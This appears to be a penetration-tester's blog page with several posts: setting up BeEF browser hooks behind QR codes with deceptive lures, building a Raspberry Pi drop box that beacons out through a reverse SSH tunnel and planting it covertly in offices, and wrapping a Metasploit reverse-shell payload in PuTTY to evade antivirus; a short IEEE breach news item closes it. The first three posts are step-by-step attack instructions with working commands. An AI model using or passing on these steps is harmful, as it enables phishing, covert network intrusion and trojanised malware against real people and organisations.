Hooking Browsers With BeEF & QR Codes

For those unfamiliar with the Browser Exploitation Framework Project, or BeEF, it is a tool that can be used to launch attacks against the often only door left open, the web browser. Once the browser is compromised, BeEF can launch further attacks to control the system. While some of us know not to scan any QR code we find, most people assume that they are safe. You can find them posted all around. Sales circulars, marketing materials, magazines, they’re everywhere. Why not take advantage of that inherent trust?

For this tutorial, I’m going to assume that you are running Backtrack 5 R3 or Kali. If not, installation instructions can be found here.

customhook

First things first, we need to edit the customhook config. When BeEF fires up, it sets the hook location to your.i.p.address/hook/ which is pretty obvious. So by editing the config, we can set a custom name for our hook and make it a little less conspicuous. The config can be found at $BEEF_ROOT/extensions/customhook/config.yaml. Pop that open with your favorite editor and change the values to whatever you want. Its pretty self-explanatory.

#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
    extension:
        customhook:
            enable: true
            name: 'Custom Hook Point with iFrame Impersonation'
            customhook_path: "/notice"
            customhook_target: "http://heyyeyaaeyaaaeyaeyaa.com/"
            customhook_title: "Notice"

Make sure you set “enable:” to true.

qrcode

Next, we need to edit the qrcode extension’s config. All you need to do here is set “enable:” to true and set the “target:” to your customhook location (or a bit.ly link of it if you’re feeling extra sneaky ;) ). It can be found at $BEEF_ROOT/extensions/qrcode/config.yaml.

#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
    extension:
        qrcode:
            name: 'QR Code Generator'
            enable: true
            authors: ["xntrik"]
            target: ["mybeefserver.com/notice"]
            qrsize: "300x300"

Now when you start BeEF, it will generate a QR code for your hook. You can also append the URL of your customhook to https://chart.googleapis.com/chart?cht=qr&chs=300x300&chl= and it’ll generate a code for you.

Attack!

Once you fire up BeEF after making the changes, it will create your custom hook in the location your set as well as provide you a URL where you can download your QR code from. Now the only thing left to do is figure out how you want to use it. “Scan this to try our new mobile banking app for your iPhone!” The possibilities are endless.

A Beginner’s Guide to Tubular Lock Picking

http://www.youtube.com/watch?v=ulzZ9T2oGPE

Building a Network Implant With a Raspberry Pi and Kali

I recently received my Raspberry Pi Model B from Element 14 and was trying to come up with a creative way to use it. I looked around the internet and found a bunch of people doing some really cool stuff like sending their RPis into space and building automated coffee machines, but nothing really sparked my interest. Pwnplugs are expensive. The Raspberry Pwn script is cool, but doesn’t fit all of my needs. I heard that Kali Linux is supported on the Raspberry Pi and it seemed like a match made in heaven so I figured why not turn it into a drop box and have it try to connect back out to me. Although it won’t have all the cool tunneling and filter evasion stuff that a Pwnplug or Powerpwn has, it should get the job done.

Shopping list

Raspberry Pi Model B - $35 + S&H
Case of your choosing (I like the Ninja Pibow though a plain black case with no components exposed would be more discreet) - $20 + S&H
Micro USB charging cable (5.0v @ 700 mA) - $5
HDMI cable - >$10
RPi compatible SDHC card (Lexar Platinum II 8GB, Class 6) - $20 from Target Note: NOT ALL SDHC ARE COMPATIBLE!
USB Keyboard - $10
Cat5e ethernet cable - I’m sure you have one around there somewhere…
OPTIONAL:
Micro-sized wireless dongle - $25
USB Mouse - $15

Download and Install Kali

First, download the Kali image for Raspberry Pi from here.

Then unzip the image.

gunzip kali-linux-1.0-armel-raspberrypi.img.gz

Check the name of your SD card.

df -h

If using the SDHC card I posted above, it should be a 8.0GB filesystem at /dev/mmcblk0

Unmount the SD card so that data can be written to it

umount /dev/mmcblk0

Change /dev/mmcblk0 to reflect whatever your SD card’s name is

Then use dd to write the Raspbian .img to the SD card.

sudo dd bs=512k if=kali-linux-1.0-armel-raspberrypi.img of=/dev/mmcblk0

Change /dev/mmcblk0 to reflect the name of your SD card again. dd does not display its status, so if you are concerned that is has stopped working, start up top and see if it is running (or try ps xfaw | grep dd)

Once dd has completed, eject the SD card and plug it into the RPi’s SD card slot. Then attach the HDMI cable to your monitor of choice and the RPi’s port as well as the USB keyboard and ethernet cable. Then connect the power cable and watch the device boot up. When you reach a command prompt, you’re all set and have verified the OS is working. Default creds at root / toor.

Resizing the SDHC card

It has been reported that the image may not take up the full SDHC card and you’ll be left with a bunch of useless space. I haven’t experienced the issue except with the soft-float wheezy image, but if you do, here’s how to fix that.

This will install the raspi-config script the Raspbian ships with. This includes “expand_rootfs” which will tell the file system to use the full available space on the SD card.

wget http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/raspi-config_20121028_all.deb
wget http://http.us.debian.org/debian/pool/main/l/lua5.1/lua5.1_5.1.5-4_armel.deb
wget http://http.us.debian.org/debian/pool/main/t/triggerhappy/triggerhappy_0.3.4-2_armel.deb
dpkg -i triggerhappy_0.3.4-2_armel.deb
dpkg -i lua5.1_5.1.5-4_armel.deb
dpkg -i raspi-config_20121028_all.deb

Finally, run the following command to get started.

raspi_config

Then just run the expand_rootfs script. This should take some time. Once it’s completed, just reboot and carry on.

Make some basic configuration changes

First, make sure you change the default root password to something difficult to guess.

passwd

Turn on SSH.

/etc/init.d/ssh start
update-rc.d ssh enable

Create yourself a non-root user.

adduser $WHATEVER
su $WHATEVER

If you want, you can have Metasploit start up on boot. (I would wait and do this manually as needed.)

service postgresql start
service metasploit start
update-rc.d postgresql enable
update-rc.d metasploit enable

Setup SSH

Install autossh

apt-get -y install autossh

Then use wget to pull down a script from Github that will setup the tunneling for us.

wget http://github.com/mikeymckay/reverse_ssh_tunnel/raw/master/setup_reverse_tunnel.sh
chmod +x ./setup_reverse_tunnel.sh
./setup_reverse_tunnel.sh

Before running the script, however, there are a few key piece of information that you should know before the script asks for them:

Middle-man server: This is your listening post, the host that will sit out on the internet waiting for connections from your devices. This should just be a public IP address.
Middle-man server user: This is the user you will use to login to the listening post. SHOULD NOT BE ROOT! Make sure to create a new SSH user in the sudoers/wheel group.

Finally, run the following commands from the middleman server as well as the Pi respectively:

ssh-copy-id root@middlemanserver
ssh-copy-id root@yourpi

Operations

Upon entering a facility, find a ethernet port with access out to the internet (more common than you’d think) as well as a standard wall outlet unless you have a battery pack. Plug both cables into their respective ports and walk out.

My favorite locations are under conference room tables, copy rooms, secretary desks, and common areas such as “touchdown spaces.”

Once the device is planted and assuming it has a connection out, it should automatically connect to your listening post and you now have a presence inside the network.

Conclusion

And just like that, you have a network implant that will beacon out to you over and SSH tunnel as soon as it gets and internet connection. It would be great if you could combine with with an EC2 micro instance so that you don’t have to sacrifice an laptop and could have an “always on” device.

I”m sure I’ve forgotten some things and some parts may need some more detail or not work altogether. I will update this page as I work out those bugs.

Credit to T. Bradley for the idea as well as Mikey McKay for the auto-tunnel script!

[caption id=”attachment_61” align=”alignnone” width=”300”] Raspberry Pi with the Ninja PiBow Case[/caption]

Antivirus Evasion With Metasploit

I’ve been working on producing a payload that can evade a specific antivirus product and figured I would share my notes in a post. Most documentation I have found has not been updated since 2010.

So the first thing we need to do is to figure out what payload we want to use. Since Metasploit is so well-known, there isn’t a huge difference in detection rates in their raw state as seen in the image below, so pick the one that works for you.

[caption id=”” align=”alignnone” width=”575”] Source: fuzzexp.org[/caption]

I’ll use windows/shell/reverse_tcp for this post. Pass the needed options to msfpayload and we’re done with the first step.

msfpayload windows/shell/reverse_tcp LHOST=62.141.42.101 LPORT=4444 R

The next thing we need to is pipe that to msfencode to encode the payload. In its current version, Metsploit comes with 27 different encoders. Shikata Ga Nai is the only “excellent” rated x86 encoder of the bunch, so we’ll use that. We also want to run the encoder 5 times, set the template to EXE, and specify the output location, so those options are thrown in there as well.

msfpayload windows/shell/reverse_tcp LHOST=62.141.42.101 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5  -t exe -o /root/payloads/basic.exe

The problem with this is that AV will usually pick up Metasploit’s default templates, so we need to either develop our own or provide a different one. Since making a custom EXE template is a little past my current skill level, we’ll use PuTTy as our template. Download the executable from their website and put it somewhere you’ll remember and pass it to msfencode with the -x option.

msfpayload windows/shell/reverse_tcp LHOST=62.141.42.101 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5 -x /root/putty.exe -t exe -o /root/payloads/putty.exe

Now we have a quintuple-encoded reverse_tcp payload embedded in PuTTy. Sounds great, right? Not so much. This piece of malware’s signature is picked up by 30 of 40 antivirus solutions according to VirusTotal.

A quick note on VirusTotal: DON’T SUBMIT YOUR CUSTOM STUFF TO VIRUSTOTAL! The signature will be known and will begin to be detected. You’re best bet for testing is to have a box set up with the AV you’re trying to evade, update the signature the database, and then disconnect it from the network.

Obviously, there are more advanced techniques and different ways than I’ve provided here, but this should provide a foundation to build off of. I will make a new post on writing custom executable templates once I get better understanding of that process.

Until next time.

More information and advanced tactics can be found here:

http://fuzzexp.org/anti-virus-evasion-for-metasploit.html

http://www.rapid7.com/resources/videos/evading-anti-virus-detection-with-metasploit.jsp

IEEE Breached; 100k Unencrypted Passwords

Yesterday, the Institute of Electrical and Electronics Engineers (IEEE) confirmed a breach resulting in the compromise of near 100,000 accounts.

The user IDs and passwords were obtained, according to the IEEE, by “inadvertent access to unencrypted log files.” Radu Dragusin, the man who discovered the breach, reports that “Among the almost 100,000 compromised users are Apple, Google, IBM, Oracle and Samsung employees, as well as researchers from NASA, Stanford and many other places.” Ironically, the IEEE is revered for its standards and education in computer science and related fields. However, an organization who has released 902 publications regarding security and privacy should practice at least basic access controls and cryptographic storage.

With the lessons learned following the breaches of Yahoo, LinkedIn, Sony, and eHarmony, security incidents involving plaintext passwords should be a thing of the past. Passwords should always be stored as salted hashes rather than plaintext so in the event of the account information being compromised, it would still be difficult to get the actual password itself and the blows from situations like this would be lessened drastically.

The IEEE has notified their users and requires authentication through security questions as well as a password change the next time the user wants to access their account.

More information and a great analysis of the breach can be found at http://ieeelog.com/

cubalo

Ramblings of an OFFSEC grunt